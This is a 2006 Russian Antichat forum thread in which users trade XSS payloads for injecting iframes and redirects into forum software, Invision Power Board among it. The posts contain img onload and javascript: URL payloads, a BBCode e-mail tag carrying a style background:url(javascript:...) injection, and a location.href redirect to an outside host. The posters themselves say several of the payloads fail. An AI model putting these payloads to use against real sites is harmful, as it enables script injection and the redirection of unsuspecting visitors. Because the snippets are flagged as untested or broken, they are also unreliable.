ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 16.01.2006, 03:12
Аватар для ilyha
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531

Репутация: 4
По умолчанию

Кароче, следуя логике. XSS уязвимость форума направлена на то, чтобы внедрить в просматриваемую PHP(к примеру) страничку теги таким образом, чтобы браузер смог их правильно интерпретировать. Значит, если возможно внедрение вида: <script>.....</script>, в чем же проблема реализации <iframe>.....</iframe> ....
 
Ответить с цитированием

  #12  
Старый 16.01.2006, 03:59
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

Цитата:
Сообщение от mixas  
Код:
<image src="a.jpg" onload=alert();>
Нужно вставить фрейм, пробовал так:
Код:
<image src="a.jpg" onload=document.frames[0].location.href="http://server.ru">
А не легче : <img src="javascript:alert()">
 
Ответить с цитированием

  #13  
Старый 16.01.2006, 04:02
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

Цитата:
Сообщение от ilyha  
Кароче, следуя логике. XSS уязвимость форума направлена на то, чтобы внедрить в просматриваемую PHP(к примеру) страничку теги таким образом, чтобы браузер смог их правильно интерпретировать. Значит, если возможно внедрение вида: <script>.....</script>, в чем же проблема реализации <iframe>.....</iframe> ....
ЁМОЁ!!! ))))

Береш сплоит... Находишь строчки кода HTML и меняешь их... На нужные...
Дай сплоит помогу ))))
 
Ответить с цитированием

  #14  
Старый 16.01.2006, 05:07
Аватар для ilyha
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531

Репутация: 4
По умолчанию

Вот это, если не ошибаюсь XSS для последней или предпоследней версии IPB.
Код:
[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javaSCript:alert(/wj/))`
 
Ответить с цитированием

  #15  
Старый 16.01.2006, 05:15
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

Попробуй так... Хотя конечно может и не сработать ))))))
[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javascript:document.write(Т УТ НУЖНЫЙ ТЕБЕ КОД))`
 
Ответить с цитированием

  #16  
Старый 16.01.2006, 20:13
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

сильно наврят-ли )) вы че, сами то смотрите,че пишете?))))))
[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javascript:document.write(Т У Т НУЖНЫЙ ТЕБЕ КОД))`
ага... почему ` уже после ББ кода? Не тот код, если я не ошибаюсь!
 
Ответить с цитированием

  #17  
Старый 16.01.2006, 21:56
Аватар для ilyha
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531

Репутация: 4
По умолчанию

даа, че-то не работает. Блин, надо пытаться, я думаю многим будет полезен результат
 
Ответить с цитированием

  #18  
Старый 16.01.2006, 21:57
Аватар для mixas
mixas
Новичок
Регистрация: 15.01.2006
Сообщений: 10
Провел на форуме:
9353

Репутация: 0
По умолчанию

тэги типа
Код:
<iframe>
и другие в скобках не каждый форум пропустит, надо как то без них. Можно конечно просто сделать переадресацию типа
Код:
javascript:location.href='http://server.ru'
но это не то.

WizART, а что ты имел ввиду по поводу создания фрейма? Как его возможно сделать, когда теги фильтруются?
 
Ответить с цитированием

  #19  
Старый 17.01.2006, 03:12
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

А вы вообще уверены, что сплоит рабочий?
 
Ответить с цитированием

  #20  
Старый 17.01.2006, 19:00
Аватар для mixas
mixas
Новичок
Регистрация: 15.01.2006
Сообщений: 10
Провел на форуме:
9353

Репутация: 0
По умолчанию

Цитата:
Сообщение от bul666  
А вы вообще уверены, что сплоит рабочий?
А причем здесь сплоит? Вопрос в том как вставить фрейм без тэгов в скобках.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ